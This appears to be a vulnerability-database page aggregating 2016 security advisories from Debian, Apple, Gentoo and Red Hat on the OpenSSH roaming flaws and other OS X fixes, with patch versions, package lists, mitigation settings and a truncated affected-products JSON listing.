if (options.rekey_limit || options.rekey_interval)
packet_set_rekey_limits((u_int32_t)options.rekey_limit,
.
More details about identifying an attack and mitigations will be available in the Qualys Security Advisory.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u3.
For the stable distribution (jessie), these problems have been fixed in version 1:6.7p1-5+deb8u1.
For the testing distribution (stretch) and unstable distribution (sid), these problems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002
OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team
AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB
Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher
dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. CVE-ID CVE-2016-1738 : beist and ABH of BoB
FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash
IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox
NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero
OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys
OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys
OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195
Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG
Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca
Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. CVE-ID CVE-2015-7551
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
Tcl
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3
Impact: Processing a maliciously crafted .png file may lead to
arbitrary code execution
Description: Multiple vulnerabilities existed in libpng versions
prior to 1.6.20. These were addressed by removing libpng.
CVE-ID
CVE-2015-8126 : Adam Mariš
TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171
OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE----- .
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/openssh < 7.1_p2 >= 7.1_p2
Description
Qualys have reported two issues in the "roaming" code included in the OpenSSH client, which provides undocumented, experimental support for resuming SSH connections. Users with private keys that are not protected by a passphrase are advised to generate new keys if they have connected to an SSH server they don't fully trust. To do so, add "UseRoaming no" to the SSH client configuration, or specify "-o 'UseRoaming no'" on the command line.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-7.1_p2"
References
[ 1 ] CVE-2016-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777 [ 2 ] CVE-2016-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201601-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssh security update Advisory ID: RHSA-2016:0043-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html Issue date: 2016-01-14 CVE Names: CVE-2016-0777 CVE-2016-0778 =====================================================================
- Summary:
Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. (CVE-2016-0778)
Red Hat would like to thank Qualys for reporting these issues.
All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
ppc64: openssh-6.6.1p1-23.el7_2.ppc64.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-6.6.1p1-23.el7_2.ppc64.rpm
ppc64le: openssh-6.6.1p1-23.el7_2.ppc64le.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-6.6.1p1-23.el7_2.ppc64le.rpm
s390x: openssh-6.6.1p1-23.el7_2.s390x.rpm openssh-askpass-6.6.1p1-23.el7_2.s390x.rpm openssh-clients-6.6.1p1-23.el7_2.s390x.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-keycat-6.6.1p1-23.el7_2.s390x.rpm openssh-server-6.6.1p1-23.el7_2.s390x.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm
ppc64le: openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm
s390x: openssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-ldap-6.6.1p1-23.el7_2.s390x.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0777 https://access.redhat.com/security/cve/CVE-2016-0778 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/articles/2123781
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo nXgYWs8cZcyoTRVoriTGHQo= =1sk9 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0030", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "unified threat management software", "scope": "eq", "trust": 1.6, "vendor": "sophos", "version": "9.353" }, { "model": "linux", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "7" }, { "model": "solaris", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "11.3" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.11.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.7" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.1" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.6" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.11.3" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.6" }, { "model": "virtual customer access system", "scope": "lte", "trust": 1.0, "vendor": "hp", "version": "15.07" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.8" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.0" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.10.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.8" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.2" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.3" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "7.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.4" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.9" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.7" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "7.1" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.9.0" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.9" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.10.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.4" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "debian gnu linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hardened bsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openbsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openssh", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": "openssh", "scope": "lt", "trust": 0.8, "vendor": "openbsd", "version": "7.x" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "5.x" }, { "model": "utm software", "scope": null, "trust": 0.8, "vendor": "sophos", "version": null }, { "model": "linux", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "6.x" }, { "model": "hpe remote device access: virtual customer access system", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "7.1p2" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 to 10.11.3" }, { "model": "solaris", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.16" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1" }, { "model": "junos 14.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "junos 13.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.3" }, { "model": "purepower integrated manager service appliance", "scope": "eq", "trust": 0.3, 